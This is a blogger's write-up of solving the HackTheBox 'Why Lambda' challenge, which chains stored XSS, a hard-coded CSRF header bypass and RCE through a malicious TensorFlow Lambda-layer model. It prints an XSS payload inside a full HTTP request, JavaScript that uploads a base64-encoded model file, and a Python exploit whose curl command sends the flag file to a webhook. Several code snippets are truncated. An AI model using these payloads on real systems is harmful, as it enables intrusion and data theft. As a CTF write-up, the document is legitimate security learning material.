General info#
Challenge | Why Lambda |
📊 Difficulty | Hard |
📝 Solves | 84 |
❓ Topics | File Upload XSS CSRF RCE |
🕐 Time spent | +4h |
🎖️ Reviews | ⭐⭐⭐⭐ |
This was my first hard-ranked challenge on HackTheBox! I’m very satisfied of my work, because the final exploit was actually pretty complex. Thus, I will flex my final badge!
The challenge as a whole is divided into two main parts: a frontend
and a backend
, but only the first is exposed to external traffic
In the frontend
we have a site which lets us write by hand some text on top of a canvas
. The point is that, if the written text corresponds to a number, then the backend of the site should try and guess the number we wrote by using a very complex machine learning algorithm developed with TensorFlow, that is then printed back to the user. If the number turns out to be wrong, we can legitimately write a complaint to the site’s administrators.
Taking a closer look the site’s source code, the first thing that stood out to me was that the “complaints reporting” part was managed by a
script, as is often the case in this type of challenges. The script spawns a Puppeteer instance to visit the page containing our report.
def check_complaints(username, password):
options = Options()
browser = webdriver.Chrome(options=options)
browser.find_element(By.NAME, "username").send_keys(username)
browser.find_element(By.NAME, "password").send_keys(password)
browser.find_element(By.CLASS_NAME, "button-container").click()
Because this is, as I said, a very common vector for XSS
attacks in these kind of challenges, I started focusing on verifying that this was, in fact, a vulnerability.
Looking at the Vue Templates
, we can see that the prediction
field, which contains the number that we reported was wrong, is in fact not sanitized, and can be leveraged to obtain XSS
getPredictionText(complaint) {
return `<p>Our amazing model said the image represented the digit: <b>${complaint.prediction}</b></p>`;
However, we can not simply obtain the admin login cookie, as this has the HTTP_ONLY
filed checked, meaning we can not exfiltrate it via a fetch()
call to one of our webhooks.
So, we have the first vulnerability, an XSS
! What now?
I decided to start investigating on the backend.
Now that we know of the XSS
, my intuition started telling me that it was worth to test if the site is correctly protected against CSRF
attacks, both because we do not have a way to obtain the admin’s cookie and because there is a literal file called
that was pretty peculiar.
But why? Because if we can exploit a CSRF
we can potentially access some parts of the site which are reserved to the admin, without actually needing to have access to the credentials.
CSRF Token Bypass#
This is the content of the already mentioned
from functools import wraps
from flask import request, jsonify
def csrf_protection(f):
def decorated_function(*args, **kwargs):
csrf_header = request.headers.get("X-SPACE-NO-CSRF")
if csrf_header != "1":
return jsonify({"error": "Invalid csrf token!"}), 403
return f(*args, **kwargs)
return decorated_function
As usual, the CSRF
protection checks the value of an header of the request, X-SPACE-NO-CSRF
, which should be random and generated during the display of the site’s page on the user’s side. However, because in this case the value of the header is hard coded, we can easily bypass this restriction by simply adding a X-SPACE-NO-CSRF: 1
header to our XSS-fabricated
request. Here is a small tutorial by OWASP on how to correctly implement such protections.
So, now we know another potential step of the exploit: abuse a Blind XSS
vulnerability to access private endpoints via CSRF
, bypassing the filter. But which are these endpoints really?
At this point, we can narrow down the search to these 3:
, shows the sent complaints as Json, pretty irrelevant/api/internal/models/<path:path>
, to download the machine learning model used by the site, still not so useful, since the only model present is pretty useless/api/internal/model
, to upload a new machine learning model as a TensorFlow file. Since this is the only endpoint actually modifying the state of the application, this seems the way to go.
RCE via TensorFlow#
But really, what’s with these Machine learning models we’ve been talking since earlier!?
Now we can inspect the last remaining file:
, which should be responsible of managing the TensorFlow models. To summarize, TensorFlow models can be intended as small programs which are trained to solve specific tasks. In particular, our model should be able to tell a number from an image given as input, via the predict()
method. I’m saying should because, in reality, this is the code:
def predict(image_data):
# What's the point anyway?
return random.randrange(0, 9)
…a bit underwhelming.
A question arises though: why? Why would you take time to implement a TensorFlow model if then you don’t use it?. Of course the question is kind of rhetoric: because this is an HackTheBox challenge and this TensorFlow model stuff probably contains the last step of our exploit chain.
Thus i started peeking into the model uploading part. As the code suggests, the model is not simply uploaded, but also parsed by TensorFlow itself:
@app.route("/api/internal/model", methods=["POST"])
def submit_model():
if "file" not in request.files:
return message("Failed to upload model! You must specify a file!"), 400
file = request.files["file"]
if file and ".h5" in file.filename:
name = "".join(random.choice(string.ascii_lowercase + string.digits) for _ in range(12))
name += ".h5"
# Save model, name))
return message(f"Success, model saved at: /models/{name}")
except Exception as e:
return message("Model was uploaded but there were some errors during testing"), 422
return message("Failed to upload model!"), 400
because I didn’t really know what TensorFlow models really were, I looked around the site a bit to see if there was a way to inject some code inside a model, and I was right!
TensorFlow models (to use a term commonly used by machine learning practitioners)
are expressed as programs that TensorFlow executes.
TensorFlow programs are encoded as computation graphs. Since models are
practically programs that TensorFlow executes, using untrusted models or graphs
is equivalent to running untrusted code.
If you need to run untrusted models, execute them inside a sandbox.
Memory corruptions in TensorFlow ops can be recognized as security issues
only if they are reachable and exploitable through production-grade, benign models.
so, now we finally have a strategy:
- We can exploit the
on the dashboard to “pivot” the admin towards protected endpoints - Bypassing the
token, we can access the/api/internal/model
endpoint for the last stage - We add a maliciously created TensorFlow model to execute arbitrary code and read the flag at
Easy, right? Not exactly!
The exploit part was actually much tougher than I expected. Only at the end I realized that my strategy involved uploading a whole file via an XSS, a file which is not present on the server itself and can’t be uploaded on the server, meaning I needed a way to put the whole binary code inside the request.
The binary for the RCE#
Because the problems are many, I decided to confront them one by one. To start, I needed a way to create a malicious TensorFlow model to inject code. Ideally, the payload I had in mind was actually pretty simple: exfiltrate the flag through a cURL
curl http://WEBHOOK?flag=$(cat /flag.txt | base64)
Now I just needed some more information about the injection part. Luckily it was pretty easy to find some material:
To summarize, TensorFlow models are divided into layers, which can be roughly approximated to “mathematical functions”, one of which is delegated to some specific tasks. The layer we are interested in is called “Lambda” (seeing this, I immediately knew we were on the right path, because of the name of the challenge), and inside the linked site we also have a PoC on how to leverage this layer to obtain RCE:
import tensorflow as tf
def exploit(x):
import os
os.system("curl http://WEBHOOK?flag=$(cat /flag.txt | base64)")
return x
model = tf.keras.Sequential()
File upload of the binary with Javascript#
Now that we have a binary to execute arbitrary code, we just need to find a way to upload it using our XSS
. But how?
After a long time, I figured that the best way to do this was to take the binary source of our executable and upload it by encoding it in some way, like base64. Since I’m not really a Javascript expert, I kindly asked ChatGPT for some advices, and after a long session of chatting he came out with this code:
const formData = new FormData();
new File([
char => char.charCodeAt(0))
{ type: 'application/x-hdf' })
cat exploit.h5 | base64
object to manage the file uploading. After that, we can add our file object, which was created by decoding the base64 containing the source of our malicious binary, and by specifying its mimetype
.Putting it all together#
Now we just need to put everything together! We said that the XSS
will be our “entrypoint”, so I started by intercepting a request to submit a complaint with Burp
, and then I modified it to insert our payload:
POST /api/complaint HTTP/1.1
Content-Length: 29684
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.5993.70 Safari/537.36
Content-Type: application/json
Accept: */*
Accept-Encoding: gzip, deflate, br
Accept-Language: it-IT,it;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: space_cookie=f37395b9-4a86-4cfa-9f48-bd70549b22b3
Connection: close
"prediction": "</b></p><img src=a onerror=\"fetch('http://<CHALLENGE_URL>/api/internal/model', {'headers': {'x-space-no-csrf': '1'}, body: (() => { const formData = new FormData(); formData.append('file', new File([Uint8Array.from(atob('<base64binary>'), char => char.charCodeAt(0))], 'exploit.h5', { type: 'application/x-hdf' })); return formData; })(), 'method': 'POST'})\">"
Then I just had to wait a bit, and I received the flag with a request on the Webhook!
I’m not really good at writing reviews, so I’ll just say that this challenge was particularly stimulating to me, especially the exploitation part, and the sense of satisfaction I had solving it was just great: totally recommended!